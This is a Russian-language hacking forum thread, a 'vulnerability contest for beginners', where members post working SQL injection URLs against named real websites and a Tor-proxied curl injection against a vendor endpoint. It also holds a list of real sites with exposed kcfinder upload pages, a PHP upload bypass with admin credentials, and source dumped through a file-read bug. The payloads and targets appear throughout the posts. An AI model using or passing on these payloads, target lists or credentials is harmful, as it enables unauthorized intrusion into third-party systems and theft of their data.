Конкурс уязвимостей для новичков

Discussion in 'Песочница' started by yarbabin, 1 Jun 2015.

  1. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    783
    Likes Received:
    912
    Reputations:
    58
    Хз почему выкладывают ломанные переломанные сайты , очередной челенж
    PHP:
    |
    http://www.canterburyct.org/department.php?id=(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
    ||
    http://www.canterburyct.org/department.php?id=11))+AND+FALSE+union+select+1,2,3,4,(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@))),6,7,8,9,10,11+--+-

    Над запросами не заморачивался,  просто скопировал то что попалосьсмысл другой  был.
    спасибо  Dr.Z3r0
    HTML:
    http://www.jurui-cn.com/military.php?id=9++and+false UNION%0Aselect+1,2,3,4,5,6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+-
    
     
    #141 BabaDook, 22 Dec 2017
    Last edited: 22 Dec 2017
  2. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    783
    Likes Received:
    912
    Reputations:
    58
    PHP:
    https://ukrmarket.net/chn/tag/" and substring(version(),1,1)=5+--+-
    https://ukrmarket.net/chn/tag/" and substring(version(),1,1)=4+--+-
    + чтение файлов.
    HTML:
    img/image.uploader.php'),\n        'CImagesUploader'       => array('core', 'img/images.uploader.php'),\n        'CImagesUploaderField'  => array('core', 'img/images.uploader.field.php'),\n        'CImagesUploaderTable'  => array('core', 'img/images.uploader.table.php'),\n        'bff\\files\\AttachmentsTable' => array('core', 'files/attachments.table.php'),\n        # captcha\n        'CCaptchaProtection'    => array('core', 'captcha/captcha.protection.php'),\n        # core modules\n        'UsersAvatar'           => array('app', 'm"
    "odules/users/users.avatar.php'),\n        'UsersSocial'           => array('app', 'modules/users/users.social.php'),\n        # database\n        'bff\\db\\Dynprops'       => array('core', 'db/dynprops/dynprops.php'),\n        'bff\\db\\Categories'     => array('core', 'db/categories/categories.php'),\n        'bff\\db\\Comments'       => array('core', 'db/comments/comments.php'),\n        'bff\\db\\Tags'           => array('core', 'db/tags/tags.php'),\n        'bff\\db\\NestedSetsTree' => array('core', 'db/nestedsets/nestedsets.php'),\n        'bff\\db\\Publicator'     => array('core', 'db/publicator/publicator.php'),\n        # external\n        'Pimple'                => array('core', 'external/pimple.php'),\n        'Mobile_Detect'         => array('core', 'external/mobile.detect.php'),\n        'CMail'                 => array('core', 'external/mail.php'),\n        'CSmarty'               => array('core', 'external/smarty.php'),\n        'CWysiwyg'              => array('core', 'external/wysiwyg.php'),\n        'qqFileUploader'        => array('core', 'external/qquploader.php'),\n        'Parsedown'             => array('core', 'external/parsedown/parsedown.php'),\n        'Minifier'              => array('core', 'external/minifier.php'),\n        # core\n        'Model'                 => array('core', 'model.php'),\n        'Errors'                => array('core', 'errors.php'),\n        'func'                  => array('core', 'utils/func.php'),\n   "
         'Pagination'            => array('core', 'utils/pagination.php'),\n        'config'                => array('core', 'config.php'),\n        'Cache'                 => array('core', 'cache/cache.php'),\n        'Component'             => array('core', 'component.php'),\n    );\n\n}"
    
     
  3. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    400
    Likes Received:
    64
    Reputations:
    18
    Arbitrary file upload 1.php.asd
    Code:
    http://ecaterix.md/ecaterix.md/kcfinder/browse.php
    http://www.basukiwater.com/assets/js/mylibs/kcfinder/browse.php
    http://www.oonohousing.com/member/user/kcfinder/browse.php
    http://www.golfoldcourse.com/kcfinder/browse.php
    http://www.careersinmorocco.com/www3/assets/js/ckeditor/kcfinder/browse.php
    http://dinamikadwiputraperkasajaya.com/admin/assets/kcfinder/browse.php
    http://grossiste-tissus.fr/ckeditor/kcfinder/browse.php
    http://ex-theatreasia.com/kcfinder/browse.php
    http://tohmei-group.sakura.ne.jp/user_data/packages/admin/js/kcfinder/browse.php
    http://www.urfaposet.com/panel/kcfinder/browse.php
    http://www.raksthai.org/asset/kcfinder/
    http://www.godimex.pl/sklep/design/_js_libs/ckeditor/kcfinder/browse.php
    http://hadu.org/kcfinder/browse.php
    
    Гуглом можно насобирать сайтов
     
    #143 Octavian, 1 Feb 2018
    Last edited: 1 Feb 2018
    BabaDook likes this.
  4. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    783
    Likes Received:
    912
    Reputations:
    58
    Если честно, то к сожалению я ничего не понял, распиши пожалуйста где там уязвимость .
     
  5. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    400
    Likes Received:
    64
    Reputations:
    18
    Можем загружать PHP фаилы
    L:fm_admin
    P:fm_admin
    Code:
    http://ecaterix.md/ecaterix.md/kcfinder/upload/files/filemanager.php.asd
    
     
    BabaDook likes this.
  6. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    783
    Likes Received:
    912
    Reputations:
    58
    PHP:
    http://www.termo.karelia.ru/weather/w_history.php?town=msk&month=4&year='+UnIon+SeLEct+user(),null,null,null,null+--+_
     
  7. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    783
    Likes Received:
    912
    Reputations:
    58
    karkajoi likes this.
  8. ms13

    ms13 Level 8

    Joined:
    19 Jun 2015
    Messages:
    1,762
    Likes Received:
    6,559
    Reputations:
    96
    там оно всё дырявое куда не ткни...
    писать бесполезно - пишут, что всё починили и всё работает.
    Code:
    curl -s -k --proxy socks5://127.0.0.1:9150 http://onesecurity.zyxel.com/php/wizard.php --data "instruction=get_wizards&parameters%5Btype%5D=z%27 union select 1,@@version--+&parameters%5Bdirection%5D=DESC&parameters%5Bget_active%5D=true"
    
    "Microsoft SQL Server 2005 - 9.00.5057.00 (Intel X86) Mar 25 2011 13:50:04 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 6.0 (Build 6002: Service Pack 2)"
     
    Jerri, man474019, Veil and 1 other person like this.
  9. karkajoi

    karkajoi Member

    Joined:
    26 Oct 2016
    Messages:
    136
    Likes Received:
    64
    Reputations:
    1
    + sql inject
    Code:
    http://www.task.ua/funds/?id=1&language='and updatexml(NULL,concat(0x0a,(SELECT database())),Null)-- -
    
     
    HeReTiC, ms13, crlf and 1 other person like this.
  10. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    783
    Likes Received:
    912
    Reputations:
    58
Loading...